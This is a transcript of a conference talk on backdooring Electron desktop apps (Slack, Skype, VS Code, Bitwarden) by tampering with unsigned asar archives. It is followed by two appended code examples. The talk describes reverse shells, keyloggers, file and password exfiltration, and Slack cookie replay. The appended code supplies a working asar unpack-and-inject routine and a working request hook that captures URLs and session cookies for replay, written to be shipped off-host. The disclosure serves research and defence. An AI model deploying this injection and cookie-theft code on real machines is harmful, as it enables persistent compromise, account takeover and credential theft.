
Moderator: Good morning, welcome to BSides Las Vegas Breaking Ground. This is Pavel and he'll be giving a talk on BEEMKA, Electron post-exploitation when the land is dry. But first a few announcements. We'd like to thank our sponsors and volunteers, without whom this event couldn't happen, especially Critical Stack and Valimail and Amazon and BlackBerry and the NSA. These talks are being streamed and recorded, so please don't use your cell phones. And if you have questions... Pavel, do you want questions during your talk or after? If you have questions, raise your hand and I will bring the microphone over to you. Thank you.

Pavel: Hi everyone, my name is Pavel Tsakalidis and I'm a senior consultant for Context Information Security, which is based in London. So before I begin: when I was making the presentation I was given two pieces of advice. One was that I should start with a joke, and the second was that I should practise, I should record the whole thing and then do the circle again and again until I'm happy with the result. But by recording my presentation and listening back to it, what happened was that I heard my own voice, and I heard how I sound to the outside world. So instead of starting with a joke I'll start with an apology, because I have no control over my voice.

Having said that, today I'll be talking about Electron post-exploitation when the land is dry, and I will introduce a tool as well that makes the whole process a bit easier. So let's assume that you are on a red team job, you have done your phishing campaign, and somebody just opens the Word document and you get a beacon back. The next sensible step would be to just try and find a way to persist on the system. But let's assume that the endpoint is running some sort of endpoint protection that you've never heard of, never seen before in your life, and it's just blocking most of the things you try to do to start something when the machine boots. That is where Electron applications come into play.

I will start straight away with the demo to display how it works in action, and then we can discuss how it can actually be exploited. So on the right-hand side we have the victim, on the left-hand side we have the listener that the attacker has set up. At this point let's assume the application has been backdoored; don't pay attention to the command line. When the user logs in we will see that on the left we get a reverse shell back. This runs Xubuntu, and we can see that Skype runs without any sort of warnings, however we get a shell back. This works across all operating systems, as long as the application is built with Electron. So now we're going to see how we can actually achieve that.

These are some popular desktop applications that have been built with Electron. The ones that stand out are Slack, Signal, Visual Studio Code and Skype. In this instance it is worth mentioning that Skype has three versions. One version is Skype for Business; this one is not built with Electron. The second version is the one that's in the Windows 10 app store, and that as well is not built with Electron. The third one is the one we download from the website, and that's the one that's built with Electron, so that's the only one that's vulnerable across the operating systems.

So what exactly is Electron, and why do more and more companies use it? It practically runs Node.js in the backend and Chromium in the front end, and it's effectively Chrome in a box. So any Electron application you have running is practically a Chrome browser running alongside everything else. It was developed by GitHub around 2013 and I think their first big project was Atom, the Atom editor. So why do more and more companies use it? Well, the answer is quite obvious: because it's cost effective. You just have to write it once and then cross-compile across the operating systems you want to offer support for, and then you do not need to hire software developers, you can just use the code you use on your website, put it in the Electron application, and that's it. So this is an example of how Skype looks: you can practically open Skype and press Ctrl+Shift+I and the developer console will open. You can see there is the element inspector, the network manager; it's effectively Chrome, that's pretty much what it is.

So to understand what makes this attack possible, we'll have to discuss how Electron actually works. Electron is based on asar files, which is another compressed archive format like zip or tar or anything like that. So when you double-click on an app, the first thing it does is run Chromium and Node.js, it kind of spins that up, and then it loads its bootloader (it's easier to understand it that way) from electron.asar. What electron.asar does is prepare the whole environment for the application to be loaded. Once that's done, app.asar is loaded, which is effectively the source code of the application. If you open app.asar it's effectively a web root: there's an index.html file which is loaded, and then everything else is loaded after that.

Here are some facts about asar files. They are not encrypted, they are not signed, they are not scanned by AV software, although zip archives are scanned, and rar and ace and tar and everything else; asar files however are not, and they're not even encrypted. And the last and most important one, the reason why this whole presentation came to be, is that there are no integrity checks in place to make sure that once you install something it's right there, in the format that it should be. So here I made an example file
where I took the EICAR test file and just put it in an archive and uploaded it to VirusTotal, and from the 50-odd engines only five of them identified it. I was quite surprised that Baidu, like China, they are already scanning those kinds of files, and I think three out of those five products are from China. So it might make someone think: why do the Chinese scan that and nothing else does?

So developers are weird creatures. We try and protect the source code and hide the source code, make sure nothing is changed, nothing is edited, modified or whatever. However there have been a lot of developers coming forward and saying: can we encrypt the source files, protect the source files, do something so that someone might not be able to change the source files? And the destiny of all those issues is they end up closed, because they say: well no, if you want to do it you have to do it yourself; this is how Electron works and this is how it will work.

So, the tool. I believe pretty much all of us here have at some point written a script or a tool or some sort of application, and then once we have it we have to find a really cool name for it. I went the other way: I always had BEEMKA, because I had a teddy bear called BEEMKA when I was young and I wanted to use this name, so I have almost managed to make it happen. At the moment BEEMKA stands for Basic Electron Exploitation Modular, and then I will need help on the K and the A, yeah. I'm happy to accept any recommendations afterwards, and I will reward anyone that has some sort of suggestion with a beverage of your own choosing. I'm happy to bribe people to get it working.

Out of the box, at the moment, what it does is: you can install keyloggers, take screenshots of the application or the entire desktop, you can inject operating system commands, access devices, and you can create targeted modules for applications. I think the most interesting part of that is the targeted modules, and here we're going to see an example where an attacker can exfiltrate source code files from Visual Studio Code. Once again, on the right there is the attacker's endpoint and on the left is a developer that just runs Visual Studio Code. As you can see, no warnings, nothing came up, everything's fine, and then the developer starts opening files. This module is designed to only exfiltrate open tabs rather than the whole directory structure, so you can see that on the right files begin to appear, and those are the ones that have been opened by the developer, and by just clicking on a file we can see its contents. If someone wanted to take this a step further they could just inject a file into the source code, and because Visual Studio Code probably has everything already unlocked and ready for the developer to use, they could just do a git commit and push to master, well, assuming that company doesn't have a code review process and all that. But if someone is not careful enough you may end up with code in the production environment that shouldn't be there.

So once I built the tool I was like, I'm going to play it safe, I'm just going to contact the Electron team and tell them this is what I did, this is how it came to be, do you think it should be fixed or something should be done? And this is the response I got from them. Yes, the slide is empty, because I got no response at all. So at that moment I said okay, fair game, it's not a bug, it's a feature, so I'll just keep going with the whole process.

So how does it actually work? I really hope at this point I could say that there's some magic that was done and that I did something cool and found a really cool trick or something. No, there's nothing like that: you can just take electron.asar, unpack it, modify a file, put your payload in and then pack it again, and that's the end of it. So when you unpack electron.asar there are a lot of files that can be used. I will hopefully... Thank you! One bowl of no yellow M&Ms, why not! Oh. [Laughter] Yes, so apparently I put in as a requirement that I don't want yellow M&Ms. Okay, thank you.

So there are a lot of files that someone can edit to inject a payload in, however I found that the most reliable one is chrome-extension.js. Electron offers a number of APIs, a number of event listeners, that you can just trigger when the application loads; one of them is app ready, or window created. The way it works is you have the Electron app, that's the application, then you open a window, and then you have the webContents; that's kind of the format of it. And then you just pack the file, put it in its place, and wait for the user to run the application.

This is some basic functionality that BEEMKA has. One is to unpack or pack a file, in case you want to not unpack Electron but just unpack the application itself and see what it does, and maybe find an XSS that nobody knew was there, or whatever you want to do. And then there's the injection, where you can just take a module and inject it inside Electron. When you run inject you don't have to run unpack, inject, pack; you can just do inject and it does everything for you. Also at this point I would like to say that I hoped there would be sufficient documentation on how to write your own module by now; however there isn't. So if you want to build a module, just have a look at the existing modules and see how those work and try to figure it out, or just drop me a line and I'd be happy to help you. So this is what electron.asar looks like: a lot of folders, a lot of JavaScript files, and you can do whatever
you want with it. So, payloads. Does anyone here hate JavaScript with a passion like I do? If someone has never used JavaScript, imagine Java and PHP getting together, having a stroke and then having another stroke; I can't even evaluate two strokes. That's what JavaScript is. So all the payloads are written in JavaScript, all of them, and there are two ways you can execute something from Electron. One of them is from within the context of the application, so you just inject JavaScript inside the application, and the other one is within the context of Electron, so that's kind of one step behind, on the Node.js level.

So here's how the application-context injection works. It's plain JavaScript; whatever works in Chrome will work in Electron. Instead of trying to find an XSS endpoint and an XSS vulnerability and exploit that, you can just inject it straight away inside the application, and long story short, if you just want to load the whole of jQuery and update the whole interface of the application, you can do that. And then there are extra bits that you can call from within the application's context that will give you more functionality, like reading files or accessing devices. The Visual Studio Code exfiltration that we saw is from the application's context, so it's just code inside that was running on intervals, checking when a file is open and then reading the filesystem, getting the file and exfiltrating it back.

There are some restrictions though. If the application is using CSP headers you will not be able to do any POST requests, any AJAX requests, back to your endpoint. Those obviously can be bypassed by updating the hosts file, but then the game is on a whole different level and it's not just in that application. Skype, for example, is using CSP, but it's not using it in the HTTP headers, it's using it within a meta tag, which I couldn't find a way to bypass. Electron offers you some sort of API manipulation techniques where you can just remove HTTP headers, but it doesn't allow you to update the body of the response. And then we have webviews that cannot be accessed. A webview is like a sandbox that runs in a different process ID within Electron. Slack in this case is using webview, so you cannot install something within the application's context; you can't install a keylogger, because the keylogger is effectively JavaScript that just does onkeyup and grabs all the keystrokes. But that does not mean that you cannot execute anything within Electron's context, like a reverse shell, like Skype for example, because the Skype backdoor was not in the application's context, it was in Electron's context.

So here's how the Electron-context payloads work. It's still JavaScript, Node.js this time, and there is more functionality from the perspective of the server. So you can intercept or block HTTP requests. This means that when the application runs and checks if there are new updates, what you can do is either block that request, and then the application will think okay, I'm on the latest and greatest version, no need to update, or you can spoof that whole request and then redirect the user to an update that's yours. In this case that would be, I think, more dangerous, because that way someone might just install, with administrative privileges, a new backdoor. And then another interesting bit is that because it's still a browser that's running, if it tries to communicate with an endpoint that has self-signed certificates it will just stop, it will just say sorry, it just doesn't work. There are event handlers that are triggered every time something doesn't work, like for example the certificate, and you can just instruct it to bypass that. So if you have an endpoint that is just an IP address and you can't install a valid SSL certificate, you can just install this event handler and your request will go through.

Now, what do you need to make this work? Well, obviously you need local access, like we discussed in the scenario with the red team before, and you need write access to the installation folder. On Windows it's easier, because if an Electron installer detects that you are a low-privileged user it will just install in the application data folder, and therefore you have access to write in that directory. But most installers also offer you the capability to install across the whole system, in which case it will go to Program Files, which makes life a little bit more difficult. On Linux and Macs, because you need elevated privileges to install something, it will be a little bit more complicated.

Now, ways to exploit, and this is where it gets interesting. So you can run operating system commands and you can do anything you want; however the executable is not modified, so the hash of the file, of slack.exe or skype.exe or vscode.exe, remains exactly the same. So what it does is you just instruct a totally legit application to run something that you want to run, and it just does it. Therefore we have gone to great lengths to create AppLocker and whitelisting and blacklisting and all that kind of thing, and in-memory patch protection and reverse engineering protection and encrypting the exe files and everything, and then you have something like this: we just leave the application as it is, but then you can run whatever you want on the side.

Another valid attack would be to redistribute a malicious application. That way someone will just download the installer; the installer will obviously not be signed, however how many times did you actually check if something is signed? Just click the yes button and install. But the installed application will look like that: the exe will still be signed, therefore it will bypass any whitelisting restrictions you have, anything you have on that box. Another interesting way to attack something is you gain access to data that you previously did not have access to, for example passwords within a password manager or messages within Slack. And last but not least, you can spy on the user using a webcam, screenshots or microphone or whatever you want. Someone might argue here that this is called gathering intel on the target; society calls this stalking, and it's not cool and should be avoided at all costs.

So here's an example of how we can exfiltrate stored passwords from Bitwarden. Does anybody use Bitwarden? Nice, don't use the desktop app. So here again on one side we have the user and on the other side we have the attacker's endpoint. As we can see, the user will just unlock their vault; we don't care about this password, because it's what's inside that counts. Once unlocked, everything will be exfiltrated back to the attacker, and as simple as that you have just lost all your passwords, because you installed a desktop app that has somehow been backdoored. Obviously this doesn't work on the web versions of those apps.
So what do these next-generation applications try to achieve? The first thing is to bring the web to the desktop. I say leave the web on the web, but okay, fine, if companies want to save money by building everything with JavaScript, that's fine with me. The source code is stored locally; again, that's fine with me. But it shouldn't be fine to not perform integrity checks on your files, because you expect you're running something and then you have no control over what format it is in now, if it has been backdoored. Another important thing is that you introduce a whole range of web vulnerabilities to the desktop. If you have an XSS vulnerability on a website, it's highly unlikely that you will be affected on some other website; most of the time it just affects that specific website, unless someone drops a zero-day, and if someone drops a zero-day to get you, you probably have bigger problems than just using Electron. And then you can also use devices, which if you do on the web version of the application, Chrome will just pop up a box saying: do you want me to use the camera or microphone? Electron doesn't; it just says "can I use the camera?", "yes, here we go", and the light of the camera will turn on. So it's bypassing that; it's just that you have no idea when that's enabled.

Here's an example of how a web vulnerability which we take lightly, which is when logged-in sessions are transferable, which is literally a low issue, we don't really care about it, here's how it could work. So we have a user that's running a vulnerable, a backdoored, version of Slack, and they try to log in. However this user is quite security aware and they have two-factor authentication as well, so they feel pretty good about themselves. So once putting the 2FA in, the user will be logged back into Slack. At this point what the backdoor does is it sends all HTTP requests and URLs back to the attacker's endpoint. So once someone's logged in, by this point everything has already been sent out to the attacker, and it keeps sending it to the attacker, so nothing stops. And here are all the cookies that have been sent, grouped by time, so we pick any of those and we take the whole cookie. I realise it's quite a lot of cookie; from this cookie we just need b, d and x. Next step. So this video was done on the same machine, but it works across IP addresses; it's just easier to do a video on the same box. So what we do is we just recreate all those three cookies and we give them access to slack.com and all subdomains; if you don't include all subdomains you just end up in an infinite loop. So once you move all the cookies... yes, I could have written a script to do this quicker, but I'm really good at copy-pasting and I wanted the whole world to see. So look in the top right, it says "sign in and get started"; once all three cookies are in place...

Do you feel the suspense? So once it's refreshed, the top right becomes "your workspaces", and by clicking it you have just gained access to the Slack. And because if someone's running a local version of Slack and they just shut down their machine they will not be logged out, it means that you will have access here until the session expires, and if you keep using it the session will probably not expire. Also this is a good way to check if developers have shared passwords, API keys, if someone uploaded a legal document or a contract or something; we just access the whole history and do whatever you want.

So how does the previous attack actually work? One of the API event handlers that Electron offers is onBeforeSendHeaders, which means that before any HTTP request is done it goes through here. So what we do here is I take the URL and the cookie and send it back to the attacker. This way, yes, it does duplicate all HTTP requests, but if we had some logic to it we could just stop the moment we have everything under control. Also it's worth mentioning that this happens on the application level, so there is no need to install a system-wide proxy or something that the user will notice, because if an attacker does that it's very transparent, they will never know what's happening. And if my endpoint, instead of example.com, is slack-updates.jp or something strange, it will not be noticed, because they will think that okay, this is a legit Slack endpoint.

So what are some ways to protect ourselves? At the moment there isn't an official fix. However Electron 6 was released last week, but I didn't have time to check if integrity checks have been implemented; hopefully this will change. Another step is to install applications as a high-privileged user. This mostly applies on Windows; however even by doing that we can just hope that the attacker does not elevate their privileges, because once they do, once they have write access to the folder, it's game over. Then we can monitor the process tree. This could work, I think, so if you see slack.exe running PowerShell you can be like, okay, this shouldn't happen, we should investigate. But if you look at the right, that's a legit Visual Studio Code process tree: it runs git, cmd.exe, it runs PowerShell, it runs everything, so it might be quite difficult to identify what happens here. And this will only protect against command injection; if an attacker wants to make a C2 server and just use HTTP requests from within the app, you will never know, because it's Chromium itself that does all the requests. And overall, if you can avoid it, don't install the desktop app, and yes, I am talking about Slack, because if you have the web version of something that does exactly the same as the desktop version, at this point there is no reason to install a desktop version. Just use the web, because the browser will protect you, will sandbox everything, and will let you know if someone tries to access something that they shouldn't.

Now, is it just Electron apps that are vulnerable to this or similar attacks? No, because Spotify is not using Electron, but Spotify is using the Chromium Embedded Framework, which is bare-metal Electron, and instead of using asar files they use the so-called .spa files, which stands for Spotify app. However, renaming
an .spa file to .zip, you can just extract the file, update index.html, put "hello world" in, and that's it. I assumed that there could be some interesting attack vectors to be tested with Spotify; I haven't done any of that, I just realised that it's vulnerable as well and mention it in case someone wanted to use it as homework.

So the summary would be: Electron apps. If you are on a red team, or if you have compromised the host for whatever reason, and you want to either maintain persistence or just gain access to applications or data within the applications, just use an Electron app that's installed. Most probably you will have some sort of Visual Studio Code or Slack or Signal or something like that installed on a corporate machine; well, Signal would be on a non-corporate machine, but yeah, you get the point. And fortunately and unfortunately, this whole thing will stop existing the moment Electron adds an integrity check on those two files, because the moment they do that you won't be able to change anything without actually changing the exe signature, which I think is the most important part of the whole attack. Yes, if you have sudo access or admin access on a host you can do whatever you want, but if you try to change an exe file you will change its hash, so by changing the hash you will trigger some sort of alarms and alerts. In this case nothing like that happens: the exe will always stay the same, nothing will change, and you might already have some sort of backdoored application that you have no idea is there, and because antiviruses do not check asar files, that means that you might have something in those files that will never see the light of day.

I was once on an engagement, and once I got the beacon back I was already running as SYSTEM, and no matter what I did they were running some sort of weird, well, unknown endpoint protection, and no matter what I did it would just block it. So at that moment I realised they had Slack installed, and I just put the PowerShell payload in Slack, and when the user logged in it just spawned the shell back. So if you want the source code it's on GitHub, and I will also be at the DEF CON Demo Labs on Friday if you want to come and see it in action, or play around with it, or ask any questions, or make a module, I don't know. You can come and have a look, and that's pretty much it. Any questions, or anything you would like me to clarify? I realise this was quicker than expected.

Audience: Hello, hi, thanks for the presentation. I have a question, because you mentioned that the CSP headers are honoured.

Pavel: Yes.

Audience: From a developer's perspective, from an app developer's perspective, is it possible to use something like SRI, subresource integrity, in order to verify your JavaScript files inside the application? Would that stop an attacker? Because integrity checks on the whole archive, that's something that Electron has to do, right? You can't do it as an application developer, but you could use SRI, I'm thinking, to check the JavaScript files within your app.

Pavel: Yes, but it will only protect you against a specific file that you as a developer have inserted in the application. The attacker can insert their own, so it can load something from example.com or attacker.com, which, since they inject the JavaScript, they will just not put the SRI in and they will just load the file as normal.

Audience: Thank you for the presentation, it was really nice. I was wondering, at some point you mentioned that Electron is on Node.js, right?

Pavel: Yes.

Audience: So have you checked, is it able to access any resources that Node.js has access to? For example, I believe it also has access to the file system.

Pavel: Yes. So the Visual Studio Code example, that was the application calling the Node.js file system, and that's how it's reading the file and that's how it's sending it back. So anything that Node.js does is accessible.

Audience: So that means this could actually be used to exfiltrate any files hosted on that...

Pavel: Yes, exfiltration. You can create your own browser-like C2 server and just double-click on folders and do whatever you want, yeah.

Audience: Great talk, thanks so much. So I'm just curious, maybe I missed this: for getting a reverse shell from the Electron context, how does that exactly work?

Pavel: So you can call... actually I can show you, I think it'd be easier. So if you do Linux, for instance... how do I... does anyone know the shortcut to... oh, there it is, magic happens. Yeah, so you just use the Node.js net and child_process, then you just run whatever command you want, whichever host, and as long as you have a one-liner to do it you can just use it here and it will work fine.

Audience: And then you mentioned the privilege difference for the installed application.

Pavel: Yes.

Audience: So how does that protect the process? So if, let's say, you have a user that just double-clicks on the phishing email and the attacker gets a reverse shell, but they're still running with the same privileges as that user; if Slack was installed in Program Files you would not be able to change that file?

Pavel: Yes, so that in essence makes it a bit more secure, but the moment the attacker gets admin or SYSTEM it's game over.

Audience: Okay, awesome, thanks.

Moderator: Cool, thank you very much. Enjoy the rest of the conference and conferences. [Applause]
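As an added worked example for the "unpack, modify a file, pack it again" process the talk describes (this is not from the talk and not BEEMKA's own code): a dependency-free reader and writer for the asar container, enough to parse an archive, replace one file and rebuild it. It assumes the on-disk layout documented by the asar project, two Chromium pickles (a uint32 header size, then a JSON file index) followed by the raw file bodies, and uses a constructed three-file tree standing in for app.asar; the function names `packAsar`, `parseAsar` and `injectAsar` are this example's own, and the injected string is a harmless marker, not a payload.

```javascript
// Added example, not from the talk or the BEEMKA project: a minimal asar
// pack/parse/inject in plain Node.js, to show why an archive with no
// signature or checksum can be rewritten in place and reloaded as-is.
// Assumed layout (per the asar project's documentation):
//   uint32 LE  4                      (outer pickle payload size)
//   uint32 LE  header pickle length   (size of the next block)
//   uint32 LE  header pickle payload size
//   uint32 LE  JSON length, then the JSON header padded to 4 bytes
//   file bodies, concatenated, addressed by header[...].offset
const ALIGN = 4;
const alignUp = (n) => (n + ALIGN - 1) & ~(ALIGN - 1);

// Serialise a tree ({ 'index.html': Buffer, 'dir': { ... } }) to an asar
// buffer. Offsets are strings in the JSON header, as asar writes them.
function packAsar(tree) {
  const bodies = [];
  let offset = 0;
  const walk = (node) => {
    const files = {};
    for (const [name, value] of Object.entries(node)) {
      if (Buffer.isBuffer(value)) {
        files[name] = { size: value.length, offset: String(offset) };
        bodies.push(value);
        offset += value.length;
      } else {
        files[name] = walk(value); // subdirectory
      }
    }
    return { files };
  };
  const headerJson = Buffer.from(JSON.stringify(walk(tree)), 'utf8');
  const headerPickle = Buffer.alloc(8 + alignUp(headerJson.length));
  headerPickle.writeUInt32LE(4 + alignUp(headerJson.length), 0);
  headerPickle.writeUInt32LE(headerJson.length, 4);
  headerJson.copy(headerPickle, 8);
  const sizePickle = Buffer.alloc(8);
  sizePickle.writeUInt32LE(4, 0);
  sizePickle.writeUInt32LE(headerPickle.length, 4);
  return Buffer.concat([sizePickle, headerPickle, ...bodies]);
}

// Parse an asar buffer into { header, files } where files maps a
// slash-separated path to its bytes. Nothing here verifies anything,
// because the format carries nothing to verify against.
function parseAsar(buf) {
  const headerSize = buf.readUInt32LE(4);
  const jsonLen = buf.readUInt32LE(12);
  const header = JSON.parse(buf.toString('utf8', 16, 16 + jsonLen));
  const base = 8 + headerSize; // first byte of file data
  const files = {};
  const walk = (node, prefix) => {
    for (const [name, entry] of Object.entries(node.files)) {
      const path = prefix ? `${prefix}/${name}` : name;
      if (entry.files) {
        walk(entry, path);
      } else {
        const start = base + Number(entry.offset);
        files[path] = buf.subarray(start, start + entry.size);
      }
    }
  };
  walk(header, '');
  return { header, files };
}

// The whole "attack": unpack, swap one file's contents, pack again.
function injectAsar(buf, targetPath, newContent) {
  const { files } = parseAsar(buf);
  if (!(targetPath in files)) throw new Error(`not in archive: ${targetPath}`);
  files[targetPath] = Buffer.from(newContent, 'utf8');
  const tree = {};
  for (const [path, body] of Object.entries(files)) {
    const parts = path.split('/');
    let node = tree;
    for (const dir of parts.slice(0, -1)) node = node[dir] = node[dir] || {};
    node[parts[parts.length - 1]] = body;
  }
  return packAsar(tree);
}

// Constructed sample standing in for an app.asar.
const sampleTree = {
  'index.html': Buffer.from('<html><body>hi</body></html>'),
  'main.js': Buffer.from("console.log('app');"),
  lib: { 'util.js': Buffer.from('module.exports = 1;') },
};
const original = packAsar(sampleTree);
const tampered = injectAsar(original, 'main.js', "/* injected */ console.log('app');");
```

Note that `parseAsar` also accepts an archive whose file bytes were flipped after packing; there is no field whose value would change. Later Electron releases can embed per-file hashes in this header and validate them when the application is packaged with that option enabled, so when auditing an app the first check is whether its asar header carries such entries at all.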
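As a second added example for the Slack session walkthrough (the talk's `onBeforeSendHeaders` hook that sends every URL and cookie to the attacker, and the remark that "some logic" could stop once everything is captured): the shape of such an Electron-context payload, written so it runs under plain Node. This is not the talk's or BEEMKA's code; `installRequestMirror`, `pickCookies` and `makeFakeSession` are this example's names, the example.com URLs are made up, and the fake session only imitates the one Electron method the hook uses (`session.webRequest.onBeforeSendHeaders`, which does exist with this call shape). A real payload would pass `require('electron').session.defaultSession` and a `send` that ships the event off-host.

```javascript
// Added example, not from the talk or BEEMKA: an Electron-context hook that
// mirrors outgoing request URLs and Cookie headers, reporting each distinct
// (url, cookie) pair once instead of duplicating every request.
function installRequestMirror(session, send, urls = ['*://*/*']) {
  const seen = new Map(); // url -> last Cookie value already reported
  session.webRequest.onBeforeSendHeaders({ urls }, (details, callback) => {
    const headers = details.requestHeaders || {};
    const cookie = headers.Cookie || headers.cookie;
    if (cookie && seen.get(details.url) !== cookie) {
      seen.set(details.url, cookie);
      send({ url: details.url, cookie });
    }
    // Always hand the request back unchanged so the app keeps working.
    callback({ requestHeaders: headers });
  });
  return seen;
}

// Reduce a Cookie header to the names a replay needs (the talk uses
// b, d and x for Slack).
function pickCookies(cookieHeader, names) {
  const out = {};
  for (const part of cookieHeader.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    const name = part.slice(0, eq).trim();
    if (names.includes(name)) out[name] = part.slice(eq + 1).trim();
  }
  return out;
}

// Stand-in for Electron's session object so the hook runs offline. Electron
// invokes the registered listener per request; here request() does that
// synchronously and returns whatever the listener passed to callback().
function makeFakeSession() {
  let listener = null;
  return {
    webRequest: {
      onBeforeSendHeaders(_filter, fn) { listener = fn; },
    },
    request(url, requestHeaders) {
      let result;
      listener({ url, requestHeaders }, (r) => { result = r; });
      return result;
    },
  };
}

// Constructed demonstration: the same authenticated request twice, then an
// unauthenticated one. Only one event should reach the collector.
function demo() {
  const events = [];
  const session = makeFakeSession();
  installRequestMirror(session, (ev) => events.push(ev));
  const cookie = 'b=aaa; d=bbb; x=ccc; other=ddd';
  const first = session.request('https://example.com/api/rtm.start', { Cookie: cookie });
  session.request('https://example.com/api/rtm.start', { Cookie: cookie });
  session.request('https://example.com/static/logo.png', {});
  return { events, passthrough: first, cookie };
}
```

Because the hook runs inside the application's own process, no proxy or system-wide setting changes; from the host's point of view it is still the application making its usual requests, which is exactly why process-tree monitoring does not see it.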